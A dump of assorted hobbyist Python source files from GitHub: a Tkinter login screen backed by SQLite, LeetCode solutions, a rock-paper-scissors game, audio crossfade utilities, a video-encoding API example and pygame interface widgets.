text=\"U\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introu.grid(row=1, column=9)\r\nlbl_Introu.after(9000, expandBlueU)\r\n\r\n#lbl_Intros = Label(frm_Intro, text=\"S\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=1, column=10)\r\ndef expandBlueS():\r\n lbl_Intros.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Intros.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Intros.after(5000, shrinkNormal)\r\nlbl_Intros = Label(Lfrm_Gracious, text=\"S\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Intros.grid(row=1, column=10)\r\nlbl_Intros.after(10000, expandBlueS)\r\n#===================================================apartments======================================================\r\n#lbl_Introap = Label(frm_Intro, text=\"A\", font=(\"times\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=2)\r\ndef expandBlueAP():\r\n lbl_Introap.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introap.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introap.after(4000, shrinkNormal)\r\nlbl_Introap = Label(Lfrm_Gracious, text=\" A\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introap.grid(row=1, column=11)\r\nlbl_Introap.after(10000, expandBlueAP)\r\n\r\n#lbl_Introp = Label(frm_Intro, text=\"P\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=3)\r\ndef expandBlueP():\r\n lbl_Introp.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introp.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introp.after(4000, shrinkNormal)\r\nlbl_Introp = Label(Lfrm_Gracious, text=\"P\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introp.grid(row=1, column=12)\r\nlbl_Introp.after(9000, expandBlueP)\r\n\r\n#lbl_Introsa = Label(frm_Intro, text=\"A\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=4)\r\ndef expandBlueSA():\r\n lbl_Introsa.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introsa.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introsa.after(4000, shrinkNormal)\r\nlbl_Introsa = Label(Lfrm_Gracious, text=\"A\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introsa.grid(row=1, column=13)\r\nlbl_Introsa.after(8000, expandBlueSA)\r\n\r\n#lbl_Introsr = Label(frm_Intro, text=\"R\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=5)\r\ndef expandBlueSR():\r\n lbl_Introsr.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introsr.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introsr.after(4000, shrinkNormal)\r\nlbl_Introsr = Label(Lfrm_Gracious, text=\"R\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introsr.grid(row=1, column=14)\r\nlbl_Introsr.after(7000, expandBlueSR)\r\n\r\n#lbl_Introst = Label(frm_Intro, text=\"T\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=6)\r\ndef expandBlueST():\r\n lbl_Introst.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introst.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introst.after(4000, shrinkNormal)\r\nlbl_Introst = Label(Lfrm_Gracious, text=\"T\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introst.grid(row=1, column=15)\r\nlbl_Introst.after(6000, expandBlueST)\r\n\r\n#lbl_Intros = Label(frm_Intro, text=\"M\", 
font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=7)\r\ndef expandBlueM():\r\n lbl_Introm.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introm.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introm.after(4000, shrinkNormal)\r\nlbl_Introm = Label(Lfrm_Gracious, text=\"M\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introm.grid(row=1, column=16)\r\nlbl_Introm.after(5000, expandBlueM)\r\n\r\n#lbl_Introse = Label(frm_Intro, text=\"E\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=8)\r\ndef expandBlueSE():\r\n lbl_Introse.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introse.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introse.after(4000, shrinkNormal)\r\nlbl_Introse = Label(Lfrm_Gracious, text=\"E\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introse.grid(row=1, column=17)\r\nlbl_Introse.after(4000, expandBlueSE)\r\n\r\n#lbl_Introsn = Label(frm_Intro, text=\"N\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=9)\r\ndef expandBlueSN():\r\n lbl_Introsn.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introsn.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introsn.after(4000, shrinkNormal)\r\nlbl_Introsn = Label(Lfrm_Gracious, text=\"N\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introsn.grid(row=1, column=18)\r\nlbl_Introsn.after(3000, expandBlueSN)\r\n\r\n#lbl_Introsx = Label(frm_Intro, text=\"T\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=10)\r\ndef expandBlueSX():\r\n lbl_Introsx.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introsx.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introsx.after(4000, shrinkNormal)\r\nlbl_Introsx = Label(Lfrm_Gracious, text=\"T\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introsx.grid(row=1, column=19)\r\nlbl_Introsx.after(2000, expandBlueSX)\r\n\r\n#lbl_Intross = Label(frm_Intro, text=\"S\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=11)\r\ndef expandBlueSS():\r\n lbl_Intross.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Intross.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Intross.after(4000, shrinkNormal)\r\nlbl_Intross = Label(Lfrm_Gracious, text=\"S\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Intross.grid(row=1, column=20)\r\nlbl_Intross.after(1000, expandBlueSS)\r\n\r\n\r\n\r\n\r\n\r\nLfrm_Out = LabelFrame(master, text=\"Welcome Grace\",font=(\"arial\",5), relief=\"raised\", borderwidth=5, bg=\"#ffcc5c\",padx=20,pady=20)\r\nLfrm_Out.grid(padx=500, pady=100)\r\nfrm_Mid = Frame(Lfrm_Out, relief=\"raised\", borderwidth=5, bg=\"#cfe0e8\",padx=10,pady=10)\r\nfrm_Mid.grid()\r\nLfrm_In = LabelFrame(frm_Mid, bg=\"#ffcc5c\")\r\nLfrm_In.grid()\r\n\r\nlbl_User = Label(Lfrm_In, text=\"User_Name: \", bg=\"#ffcc5c\", fg=\"#622569\", font=(\"times\",20,\"bold\"))\r\nlbl_User.grid(row=0, column=0, columnspan=2, padx=10, pady=20)\r\nlbl_Pass = Label(Lfrm_In, text=\"Pass_Word: \", bg=\"#ffcc5c\", fg=\"#622569\", font=(\"times\",20,\"bold\"))\r\nlbl_Pass.grid(row=1, column=0, columnspan=2, padx=10, pady=20)\r\n\r\nUser_Name = StringVar()\r\netr_User = Entry(Lfrm_In, textvariable=User_Name, bg=\"#cfe0e8\", fg=\"#622569\", 
font=(\"times\",20,\"bold\"))\r\netr_User.grid(row=0, column=2, columnspan=2, padx=10, pady=20)\r\nPass_Word = StringVar()\r\netr_Pass = Entry(Lfrm_In, textvariable=Pass_Word, bg=\"#cfe0e8\", fg=\"#622569\", font=(\"times\",20,\"bold\"), show='*')\r\netr_Pass.grid(row=1, column=2, columnspan=2, padx=10, pady=20)\r\n\r\ndef Validate():\r\n if User_Name.get()=='' or Pass_Word.get()=='':\r\n messagebox.showerror('Empty Fields','User Name and Password Must Be Filled')\r\n else:\r\n conn = sqlite3.connect('User_Data')\r\n cur = conn.cursor()\r\n cur.execute(\"SELECT * FROM user\")\r\n a = cur.fetchall()\r\n #print(a)\r\n cur.execute(\"SELECT * FROM user WHERE user_id=? AND password=?\",(User_Name.get(), Pass_Word.get()))\r\n c= cur.fetchall()\r\n if c:\r\n print('Login Successful')\r\n else:\r\n print('Login Failed!!')\r\n\r\n conn.commit()\r\n conn.close()\r\n\r\nbtn_Login = Button(frm_Mid, text=\"Log In\", background=\"#588c7e\", fg=\"#ff6f69\", activebackground=\"#ff6f69\", activeforeground=\"#588c7e\", font=(\"arial\",15,\"bold\"), command=Validate)\r\nbtn_Login.grid(padx=2, pady=4)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nmainloop()","repo_name":"TekJoker/Python_Project_Water_BIlls","sub_path":"ProjoZ_002_LogIn.py","file_name":"ProjoZ_002_LogIn.py","file_ext":"py","file_size_in_byte":11632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25198293932","text":"from collections import defaultdict\n\n\nclass Solution:\n def intersect(self, nums1: List[int], nums2: List[int]) -> List[int]:\n\n freq1, freq2 = defaultdict(int), defaultdict(int)\n res = []\n for num in nums1:\n freq1[num] += 1\n for num in nums2:\n freq2[num] += 1\n for num in freq1.keys():\n if num in freq2:\n freq = min(freq1[num], freq2[num])\n for _ in range(freq):\n res.append(num)\n return res\n","repo_name":"Reflectrr/leetcode","sub_path":"350.intersection_of_two_arrays_ii.py","file_name":"350.intersection_of_two_arrays_ii.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36249585854","text":"import random\n\ndef get_choices():\n player_choice = input(\"Enter a choice (rock, paper, scissors): \")\n options = [\"rock\", \"paper\", \"scissors\"]\n computer_choice = random.choice(options)\n choices = {\"player\": player_choice, \"computer\": computer_choice}\n return choices\n\ndef check_win(player, computer):\n print (f\"You chose {player} and computer chose {computer}.\")\n if player == computer:\n return \"It's a tie\"\n elif player == \"rock\":\n if computer == \"scissors\":\n return \"Rock smashes scissors! You Win. Congratulations!\"\n else:\n return \"Paper covers the rock! Unfortunately, computer wins this time.\"\n elif player == \"paper\":\n if computer == \"scissors\":\n return \"Scissors cuts the paper! Unfortunately, computer wins this time.\"\n else:\n return \"Paper covers the rock! You Win. Congratulations!\"\n elif player == \"scissors\":\n if computer == \"rock\":\n return \"Rock smashes scissors! Unfortunately, computer wins this time.\"\n else:\n return \"Scissors cuts the paper! You Win. 
Congratulations!\"\n\nchoices = get_choices()\nresult = check_win(choices[\"player\"], choices[\"computer\"])\nprint(result)\n\n","repo_name":"harsha-bhojaiah/Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6458112925","text":"from .abstract_favicon_group import AbstractFaviconGroup\n\nBROWSER_TARGET_SIZES = [(16, 16), (32, 32), (48, 48)]\n\n\nclass FaviconGroupStandard(AbstractFaviconGroup):\n def __init__(self, conf, outdir):\n super().__init__(conf, outdir)\n self.sizes = BROWSER_TARGET_SIZES\n self.filename_schema = 'favicon-{}x{}.png'\n\n def generate_images(self, favicon):\n self.generate_image(favicon, image_format='ICO',\n filename='favicon.ico')\n super().generate_images(favicon)\n","repo_name":"maxdup/flask-favicon","sub_path":"flask_favicon/groups/favicon_standard.py","file_name":"favicon_standard.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17763010133","text":"#!/usr/bin/env python\n__author__ = 'David Moser - david.moser@bitmovin.net'\n\nimport bitcodin\n\nbitcodin.api_key = 'YOUR API KEY'\n\ninput_obj = bitcodin.Input(url='http://url.to.video.with.closed.captions')\ninput_result = bitcodin.create_input(input_obj)\n\nvideo_configs = list()\n\nvideo_configs.append(bitcodin.VideoStreamConfig(\n default_stream_id=0,\n bitrate=4800000,\n profile='Main',\n preset='premium',\n height=1080,\n width=1920\n))\nvideo_configs.append(bitcodin.VideoStreamConfig(\n default_stream_id=0,\n bitrate=2400000,\n profile='Main',\n preset='premium',\n height=768,\n width=1024\n))\nvideo_configs.append(bitcodin.VideoStreamConfig(\n default_stream_id=0,\n bitrate=1200000,\n profile='Main',\n preset='premium',\n height=480,\n width=854\n))\n\naudio_configs = [\n bitcodin.AudioStreamConfig(default_stream_id=0, bitrate=192000),\n bitcodin.AudioStreamConfig(default_stream_id=1, bitrate=192000)\n]\n\nencoding_profile_obj = bitcodin.EncodingProfile('API Test Profile Closed Captions', video_configs, audio_configs)\nencoding_profile_result = bitcodin.create_encoding_profile(encoding_profile_obj)\n\nmanifests = ['mpd', 'm3u8']\n\naudio_meta_data = [\n bitcodin.AudioMetaData(0, 'Spanish', 'es'),\n bitcodin.AudioMetaData(1, 'English', 'en')\n]\n\nvideo_meta_data = [\n bitcodin.VideoMetaData(0, 'Spanish', 'es')\n]\n\njob = bitcodin.Job(\n input_id=input_result.input_id,\n encoding_profile_id=encoding_profile_result.encoding_profile_id,\n manifest_types=manifests,\n speed='standard',\n extract_closed_captions=True,\n audio_meta_data=audio_meta_data,\n video_meta_data=video_meta_data\n)\n\njob_result = bitcodin.create_job(job)\n","repo_name":"bitmovin/bitcodin-python","sub_path":"examples/create_job_closed_captions_multiple_audio_streams.py","file_name":"create_job_closed_captions_multiple_audio_streams.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"15078699485","text":"def time_stretch(audio, factor, sample_rate=44100):\n import pyrubberband as pyrb\n return pyrb.time_stretch(audio, sample_rate, factor)\n\n\ndef load_audio(filepath):\n # returns loaded mono audio.\n from essentia.standard import MonoLoader\n return MonoLoader(filename=filepath)()\n\n\ndef save_audio(audio, filename, file_format='wav', bit_rate=320):\n from essentia.standard 
import MonoWriter\n MonoWriter(filename=filename, bitrate=bit_rate, format=file_format)(audio)\n\n\ndef does_annotations_folder_exist(folder_name='pycrossfade_annotations'):\n from os.path import isdir\n return isdir(folder_name)\n\n\ndef create_annotations_folder(folder_name='pycrossfade_annotations'):\n from os import mkdir\n if not does_annotations_folder_exist(folder_name):\n mkdir(folder_name)\n return True\n return False\n\n\ndef path_to_annotation_file(annt_folder_name, file_name, file_format='txt'):\n from os.path import join\n return join(annt_folder_name, file_name + '.' + file_format) \n\n\ndef linear_fade_volume(audio, start_volume=0.0, end_volume=1.0):\n import numpy as np\n\n if start_volume == end_volume:\n return audio\n\n length = audio.size\n profile = np.sqrt(np.linspace(start_volume, end_volume, length))\n return audio * profile\n\n\ndef linear_fade_filter(audio, filter_type, start_volume=0.0, end_volume=1.0):\n from yodel.filter import Biquad\n import numpy as np\n from scipy.signal import lfilter\n\n if start_volume == end_volume:\n return audio\n\n SAMPLE_RATE = 44100\n LOW_CUTOFF = 70\n MID_CENTER = 1000\n HIGH_CUTOFF = 13000\n Q = 1.0 / np.sqrt(2)\n NUM_STEPS = 20 if start_volume != end_volume else 1\n\n bquad_filter = Biquad()\n length = audio.size # Assumes mono audio\n\n profile = np.linspace(start_volume, end_volume, NUM_STEPS)\n output_audio = np.zeros(audio.shape)\n\n for i in range(NUM_STEPS):\n start_idx = int((i / float(NUM_STEPS)) * length)\n end_idx = int(((i + 1) / float(NUM_STEPS)) * length)\n if filter_type == 'low_shelf':\n bquad_filter.low_shelf(SAMPLE_RATE, LOW_CUTOFF, Q, -int(26 * (1.0 - profile[i])))\n elif filter_type == 'high_shelf':\n bquad_filter.high_shelf(SAMPLE_RATE, HIGH_CUTOFF, Q, -int(26 * (1.0 - profile[i])))\n else:\n raise Exception('Unknown filter type: ' + filter_type)\n # ~ bquad_filter.process(audio[start_idx : end_idx], output_audio[start_idx : end_idx]) # This was too slow, code beneath is faster!\n b = bquad_filter._b_coeffs\n a = bquad_filter._a_coeffs\n a[\n 0] = 1.0 # Normalizing the coefficients is already done in the yodel object, but a[0] is never reset to 1.0 after division!\n output_audio[start_idx: end_idx] = lfilter(b, a, audio[start_idx: end_idx]).astype('float32')\n\n return output_audio","repo_name":"oguzhan-yilmaz/pyCrossfade","sub_path":"pycrossfade/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"53"} +{"seq_id":"39162893624","text":"from typing import List\n\n\nclass MajorityChecker:\n\n def __init__(self, arr: List[int]):\n self.t = dict(list)\n for j in range(len(arr)):\n self.t[arr[j]].append(j) # 按顺序遍历数组,每个元素的下标数组就自然是有序,可以直接二分\n self.arr = arr\n\n def query(self, left: int, right: int, threshold: int) -> int:\n print(self.arr)\n\n\nif __name__ == '__main__':\n z = [1, 1, 2, 2, 1, 1]\n obj = MajorityChecker(z)\n print(obj.query(0, 5, 4))\n\n# Your MajorityChecker object will be instantiated and called as such:\n# obj = MajorityChecker(arr)\n# param_1 = obj.query(left,right,threshold)\n","repo_name":"BiqiangWang/leetcode","sub_path":"daily/1157.py","file_name":"1157.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14285539534","text":"import pygame\nfrom pygame.sprite import Sprite\nimport string\n\nclass Sidebar(Sprite):\n def __init__(self, screen, contents, bckgrd, pos, 
horizontal):\n self.screen = screen\n self.contents = contents\n self.image = pygame.image.load(bckgrd)\n self.image_w, self.image_h = self.image.get_size()\n self.pos = pos\n self.horizontal = horizontal # True == Horizontal, False == Vertical\n self.direction = 0 # Initial direction (Going on/off first)\n self.speed = 0.1\n self.move = False\n #self.set_contents()\n\n def scroll_LU(self):\n self.move = True\n self.direction = -1\n\n def scroll_RD(self):\n self.move = True\n self.direction = 1 \n\n def set_contents(self):\n TOP = self.pos[1] - (self.image_h/2)\n BOTTOM = self.pos[1] + (self.image_h/2)\n LEFT = self.pos[0] + (self.image_w/2)\n RIGHT = self.pos[0] + (self.image_w/2)\n for i in range(len(self.contents)):\n if(self.layout[i] == \"TOP\"):\n self.contents[i].pos = (self.pos[0], TOP + (self.contents[i].image_h/2))\n \n def update(self, interact):\n time_passed = interact[8]\n mouse_pos = interact[7]\n click = interact[0]\n # if bar is moving\n if(self.move):\n x_diff = 0\n y_diff = 0\n\n inner_rect = self.screen.get_rect().inflate(-self.image_w,-self.image_h)\n outer_rect = self.screen.get_rect().inflate(self.image_w, self.image_h)\n\n if(self.horizontal):\n new_pos = (self.pos[0] + (time_passed * self.speed * self.direction), self.pos[1])\n x_diff = self.pos[0] - new_pos[0]\n if((new_pos[0] < inner_rect.left)and(new_pos[0] > outer_rect.left)):\n pass\n elif((new_pos[0] > inner_rect.right)and(new_pos[0] < outer_rect.right)):\n pass\n else:\n self.move = False\n new_pos = self.pos\n x_diff = 0\n else:\n new_pos = (self.pos[0], self.pos[1] + (time_passed * self.speed * self.direction))\n y_diff = self.pos[1] - new_pos[1]\n if((new_pos[1] < inner_rect.top)and(new_pos[1] > outer_rect.top)):\n pass\n elif((new_pos[1] > inner_rect.bottom)and(new_pos[1] < outer_rect.bottom)):\n pass\n else:\n self.move = False\n new_pos = self.pos\n y_diff = 0\n\n self.pos = new_pos\n for c in self.contents:\n c.pos = (c.pos[0] - x_diff, c.pos[1] - y_diff)\n c.update(interact)\n else:\n for c in self.contents:\n c.update(interact)\n\n def blitme(self):\n draw_pos=self.image.get_rect().move(self.pos[0]-(self.image_w/2),self.pos[1]-(self.image_h/2))\n self.screen.blit(self.image,draw_pos)\n\n for c in self.contents:\n c.blitme()\n\nclass Acc_Bar(Sprite):\n\n def __init__(self, screen, pos, owner):\n self.screen = screen\n self.pos = pos\n self.owner = owner\n self.font = pygame.font.Font(None, 40)\n self.font2 = pygame.font.Font(None, 60)\n\n def update(self, interact):\n pass\n\n def blitme(self):\n back = pygame.Surface((300, 150))\n back.fill(self.owner.color)\n back.set_alpha(90)\n draw_pos = (self.pos[0] - 150, self.pos[1] - 75)\n self.screen.blit(back, draw_pos)\n\n if(self.owner.alias != None):\n t_pos = (self.pos[0]-145, self.pos[1] - 75)\n if(self.owner.color[0]+self.owner.color[1]+self.owner.color[2] < 25):\n self.screen.blit(self.font2.render(self.owner.alias, True, self.owner.inv_col), t_pos)\n else:\n self.screen.blit(self.font2.render(self.owner.alias, True, (0,0,0)), t_pos)\n t_pos = (self.pos[0]+50, self.pos[1] - 25)\n self.screen.blit(self.font.render(str(self.owner.record), True, (0,0,0)),t_pos)\n t_pos = (self.pos[0]+50, self.pos[1] + 25)\n self.screen.blit(self.font.render(str(self.owner.XP), True, (0,0,0)),t_pos)\n t_pos = (self.pos[0] - 50, self.pos[1] + 25)\n self.owner.dog_tag.display(self.screen, t_pos) \n \n\n\nclass Button(Sprite):\n\n def __init__(self, screen, images, pos, event, param):\n self.screen = screen\n self.pos = pos\n self.image_base = 
pygame.image.load(images[0])\n self.image_hover = pygame.image.load(images[1])\n self.image = self.image_base\n self.image_w, self.image_h = self.image.get_size()\n self.event = event\n self.param = param\n self.clicked = False\n self.ready = False\n\n def do(self):\n if(self.param == None):\n self.event()\n else:\n self.event(self.param)\n\n def hover(self, position):\n if((self.pos[0] - (self.image_w/2) < position[0])and\n (self.pos[0] + (self.image_w/2) > position[0])):\n if((self.pos[1] - (self.image_h/2) < position[1])and\n (self.pos[1] + (self.image_h/2) > position[1])):\n return True\n else:\n return False\n else:\n return False\n\n def update(self, interact):\n mouse_pos = interact[7]\n click = interact[0]\n if(self.clicked == False):\n if(self.hover(mouse_pos)):\n self.image = self.image_hover\n if(click):\n if(self.ready):\n self.clicked = True\n self.do()\n else:\n self.ready = True\n else:\n self.image = self.image_base\n self.ready = False\n else:\n if((self.hover(mouse_pos) == False)or(click == False)):\n self.clicked = False\n\n def blitme(self):\n draw_pos=self.image.get_rect().move(self.pos[0]-(self.image_w/2),self.pos[1]-(self.image_h/2))\n self.screen.blit(self.image, draw_pos)\n\n\nclass DummyBlob(Sprite):\n\n def __init__(self, screen, image, pos):\n self.screen = screen\n self.pos = pos\n self.image = pygame.image.load(image)\n self.image_w, self.image_h = self.image.get_size()\n\n def blitme(self):\n draw_pos=self.image.get_rect().move(self.pos[0]-(self.image_w/2),self.pos[1]-(self.image_h/2))\n self.screen.blit(self.image, draw_pos)\n\nclass SmartSquare(Sprite):\n def __init__(self, screen, pos, size, acc):\n self.screen = screen\n self.pos = pos\n self.size = size\n self.acc = acc\n self.surf = pygame.Surface(size)\n self.surf.fill(acc.color)\n\n def update(self, interact):\n self.surf = pygame.Surface(self.size)\n self.surf.fill(self.acc.color)\n\n def blitme(self):\n draw_pos = (self.pos[0] - self.size[0]/2, self.pos[1] - self.size[1]/2)\n self.screen.blit(self.surf, draw_pos)\n\n\nclass Text_Box(Sprite):\n\n def __init__(self, screen, size, pos, prompt, prop):\n pygame.font.init()\n self.screen = screen\n self.size = size\n self.pos = pos\n self.prop = prop\n self.active = False\n self.base_prompt = prompt\n self.active_prompt = prompt.upper()\n self.prompt = self.base_prompt\n self.font = pygame.font.Font(None, 20)\n self.text = []\n self.hidden = False\n\n def hover(self, position):\n if((self.pos[0] - (self.size[0]/2) < position[0])and\n (self.pos[0] + (self.size[0]/2) > position[0])):\n if((self.pos[1] - (self.size[1]/2) < position[1])and\n (self.pos[1] + (self.size[1]/2) > position[1])):\n return True\n else:\n return False\n else:\n return False\n\n def get_text(self):\n message = \"\"\n for t in self.text:\n message += t\n return message\n\n def set_text(self, message):\n if(message != None):\n self.text = []\n for i in range(len(message)):\n self.text.append(message[i])\n\n def update(self, interact):\n mouse_pos = interact[7]\n click = interact[0]\n inkey = interact[3]\n shift = interact[4]\n back = interact[5]\n enter = interact[6]\n\n if(self.active == False):\n self.prompt = self.base_prompt\n if((self.hover(mouse_pos))and(click)):\n self.active = True\n else:\n self.prompt = self.active_prompt\n if(enter):\n self.active = False\n self.prop(self.get_string())\n elif(back):\n self.text = self.text[0:-1]\n elif(inkey != None):\n if((shift)and(inkey >= 97)and(inkey <= 122)):\n self.text.append(chr(inkey-32))\n else:\n self.text.append(chr(inkey))\n\n 
if((click)and(self.hover(mouse_pos) == False)):\n self.active = False\n self.prop(self.get_string())\n\n def get_string(self):\n message = \"\"\n if(self.hidden):\n for i in range(len(self.text)):\n message += \"X\"\n else:\n message = self.get_text()\n\n return message\n\n def blitme(self):\n \n frame = pygame.Surface(self.size)\n frame.fill((250,0,0))\n t_pos = (self.pos[0]-(self.size[0]/2), self.pos[1]-(self.size[1]/2))\n self.screen.blit(frame, t_pos)\n \n box = pygame.Surface((self.size[0]-2, self.size[1]-2))\n box.fill((0,0,0))\n t_pos = (self.pos[0]-(self.size[0]/2)+1, self.pos[1]-(self.size[1]/2)+1)\n self.screen.blit(box, t_pos)\n\n t_pos = (self.pos[0] - (self.size[0]/2), self.pos[1] - (self.size[1]/2) - 12)\n self.screen.blit(self.font.render(self.prompt, True, (0,0,0)), t_pos)\n \n t_pos = (self.pos[0]-(self.size[0]/2)+3, self.pos[1]-(self.size[1]/2)+3) \n self.screen.blit(self.font.render(self.get_string(), True, (255,255,255)), t_pos)\n\nclass grande_door:\n def __init__(self, screen, size, event):\n enter_images = ('buttons//enter1.png', 'buttons//enter2.png')\n self.width = size[0]\n self.height = size[1]\n self.left = Sidebar(screen, [], 'images//door.png', (-512, self.height/2), True)\n self.right = Sidebar(screen, [], 'images//door.png', (self.width + 512, self.height/2), True)\n self.left.speed = 0.5\n self.right.speed = 0.5\n self.opening = False\n self.closing = False\n self.butt_enable = False\n self.butt = Button(screen, enter_images, (self.width/2, self.height/2), event, None)\n\n def close(self):\n self.left.scroll_RD()\n self.right.scroll_LU()\n self.closing = True\n\n def split(self):\n self.left.scroll_LU()\n self.right.scroll_RD()\n self.butt_enable = False\n self.opening = True\n\n def is_closed(self):\n if((self.left.pos[0] == 0)and(self.right.pos[0] == self.width)):\n return True\n else:\n return False\n\n def shut(self):\n if((self.left.pos[0] >= 0)and(self.right.pos[0] <= self.width)):\n self.left.move = False\n self.right.move = False\n self.left.pos = (0, self.height/2)\n self.right.pos = (self.width, self.height/2)\n self.butt_enable = True\n self.closing = False\n\n def jam(self):\n if((self.left.pos[0] <= -512 )and(self.right.pos[0] >= self.width + 512)):\n self.left.move = False\n self.right.move = False\n self.opening = False\n\n def update(self, interact):\n if(self.closing):\n self.shut()\n elif(self.opening):\n self.jam()\n self.right.update(interact)\n self.left.update(interact)\n if(self.butt_enable):\n self.butt.update(interact)\n\n def blitme(self):\n self.right.blitme()\n self.left.blitme()\n if(self.butt_enable):\n self.butt.blitme()\n \n \n\n\n","repo_name":"Dirker27/GamesBrowser","sub_path":"Items.py","file_name":"Items.py","file_ext":"py","file_size_in_byte":12217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73116680167","text":"#!/usr/bin/env python3\nimport os\nimport sys\nimport glob\nimport zipfile\nimport argparse\nimport subprocess\n\n\nINCLUDE_GLOBS = [\n # documentation\n 'README.md',\n 'LICENSE.MIT',\n 'docs/*.md',\n 'docs/jxc_syntax.jxc',\n\n # editor syntax highlighting packages\n 'contrib/*/*',\n 'contrib/*.md',\n]\n\n\ndef append_filename(file_path: str, value: str) -> str:\n \"\"\"\n Adds a string to the end of a filename, inserting it just _before_ the file's extension.\n Ex. 
